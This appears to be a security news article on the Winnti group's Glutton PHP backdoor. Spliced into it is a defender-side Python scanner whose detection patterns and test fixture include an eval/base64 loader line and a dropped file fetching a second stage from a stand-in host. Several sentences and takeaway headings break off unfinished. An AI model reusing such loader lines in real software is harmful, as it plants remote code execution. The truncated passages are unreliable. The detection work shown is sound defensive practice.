2024-12-16
The Winnti group, a notorious cybercrime organization, has unleashed a new weapon: the Glutton backdoor. This PHP-based malware injects malicious code into popular frameworks like Laravel and ThinkPHP, granting attackers persistent control over infected systems. While Glutton boasts sophisticated features, its simplistic design and weak security measures raise questions about its true potential.
Glutton’s Deceptive Feast: Targeting Both Legitimate Businesses and Cybercriminals
Glutton operates through a layered attack strategy. It starts by planting backdoors in PHP scripts and business systems, which are often sold on platforms like Timibbs. These backdoors give the operators remote access and control, primarily over victims in China and the US across various industries.
Interestingly, Glutton
A Modular Malware with a Multi-Course Menu
Glutton utilizes a modular design, offering attackers a diverse “menu” of malicious options. It leverages vulnerabilities, weak passwords, and pre-compromised systems for initial infection. Once inside, Glutton injects malicious loaders into PHP files, allowing the deployment of various backdoors, including the Winnti backdoor itself.
These backdoors establish covert communication channels, granting the attackers persistent control. Notably, Glutton uses “task_loader” technology to analyze the environment and choose the most effective method for downloading the next-stage payload.
Unpacking the “Courses”: Winnti Backdoor, Baota Infection, and Framework Injection
The initial “course” served by Glutton is the “init_task” payload. This payload has three main tasks:
1. Installing the Winnti backdoor disguised as a system library for stealth.
2. Infecting Baota control panels, a popular web server management tool, to steal credentials and modify files.
3. Injecting malicious code into popular PHP frameworks like Laravel and ThinkPHP for further payload delivery.
The Baota infection process involves stealing sensitive information and uploading it to the attacker’s server, while the framework injection alters specific code lines to establish communication with the attacker and download additional malware.
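Because the framework injection described above alters lines inside files that a Laravel or ThinkPHP install already ships with, the practical defensive check is file integrity plus a heuristic pass for loader-style constructs. The script below is an added example for this article, not code from the article or from any Glutton analysis: it assumes a SHA-256 baseline manifest recorded when the framework was installed from a trusted source, and its patterns are generic webshell and loader indicators rather than Glutton-specific signatures. The sample files and the hypothetical paths are constructed inline so it runs offline.

```python
"""
Added example (not from the article or from any Glutton report): a
defender-side integrity and heuristic scanner for a PHP framework tree.

Assumptions (labelled, not from the article):
  - a baseline manifest {path: sha256} exists from a trusted install;
  - the regex patterns are generic loader/webshell indicators.
"""
import hashlib
import re
from dataclasses import dataclass

# Generic indicators of an injected PHP loader. Constructed for this
# example; these are not Glutton indicators of compromise.
SUSPICIOUS_PATTERNS = [
    (r"\beval\s*\(", "eval() call"),
    (r"\bbase64_decode\s*\(", "base64_decode() call"),
    (r"\b(gzinflate|gzuncompress|str_rot13)\s*\(", "decoding primitive"),
    (r"\b(curl_exec|file_get_contents)\s*\(\s*['\"]https?://", "remote fetch of a URL literal"),
    (r"\b(system|shell_exec|passthru|popen|proc_open)\s*\(", "command execution primitive"),
]


@dataclass
class Finding:
    path: str
    reason: str
    detail: str = ""


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def scan_tree(files: dict, baseline: dict) -> list:
    """Compare a tree ({path: bytes}) against a baseline ({path: sha256}).

    Reports: files whose hash changed, files absent from the baseline
    (possible dropped loaders), baseline files that vanished, and any
    loader-style construct found by the heuristics, in that order per file.
    """
    findings = []
    for path, data in files.items():
        digest = sha256_hex(data)
        expected = baseline.get(path)
        if expected is None:
            findings.append(Finding(path, "file not in baseline manifest"))
        elif expected != digest:
            findings.append(Finding(path, "hash mismatch vs. baseline", digest))
        text = data.decode("utf-8", errors="replace")
        for pattern, label in SUSPICIOUS_PATTERNS:
            match = re.search(pattern, text)
            if match:
                findings.append(Finding(path, label, match.group(0)))
    for path in baseline:
        if path not in files:
            findings.append(Finding(path, "file missing from tree"))
    return findings


# Constructed sample: a clean Laravel-style controller as shipped.
CLEAN_CONTROLLER = b"""<?php
namespace App\\Http\\Controllers;

class HomeController extends Controller
{
    public function index()
    {
        return view('home');
    }
}
"""

# Same file with a constructed loader line appended. The base64 string
# decodes to the harmless PHP statement  echo 'hi';
INFECTED_CONTROLLER = CLEAN_CONTROLLER + b"eval(base64_decode('ZWNobyAnaGknOw=='));\n"


def demo() -> list:
    """Run the scanner over a constructed two-file tree and return findings."""
    controller = "app/Http/Controllers/HomeController.php"   # hypothetical path
    dropped = "storage/framework/.cache.php"                 # hypothetical path
    baseline = {controller: sha256_hex(CLEAN_CONTROLLER)}
    tree = {
        controller: INFECTED_CONTROLLER,
        # Constructed file not present at install time that fetches a URL.
        dropped: b"<?php file_get_contents('http://example.invalid/stage2');\n",
    }
    return scan_tree(tree, baseline)


if __name__ == "__main__":
    for f in demo():
        print(f"{f.path}: {f.reason} {f.detail}".rstrip())
```

On a real host the baseline would come from hashing the tree right after a clean `composer install`, and the scan would be scheduled so a changed controller or an unexpected file under `storage/` surfaces as a finding before it is trusted. The hash check is what catches the single altered line the article describes; the heuristics are a second net for files the baseline never covered.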
The Dessert: Evolving with Obfuscation and Client Backdoors
Glutton continuously evolves. One variant, named “art3,” utilizes a client loader called “client_task.” This loader offers cross-platform compatibility, fileless execution, and potential antivirus evasion through obfuscated code and updated communication infrastructure.
The “client_task” module then uses this client for various purposes:
C2 communication (command and control) via TCP/UDP protocols.
Command execution, allowing attackers to perform 22 different actions, including shell access and file transfer.
Periodic payload retrieval for further malicious functionality.
Black Eats Black: Stealing from the Thieves
Glutton employs a unique tactic called “black eats black.” It utilizes the legitimate tool “HackBrowserData” to extract browser data like passwords and history from other cybercriminals who might be trying to tamper with the backdoored systems.
This creates a layered attack where attackers’ actions are used against them, allowing Glutton’s operators to steal sensitive information and gain an edge.
What Undercode Says:
Winnti’s Glutton backdoor highlights several crucial cybersecurity takeaways:
Supply Chain Attacks:
Multi-Layered Threats:
Evolving Malware:
Black Eats Black Strategies:
By understanding
References:
Reported By: Cyberpress.org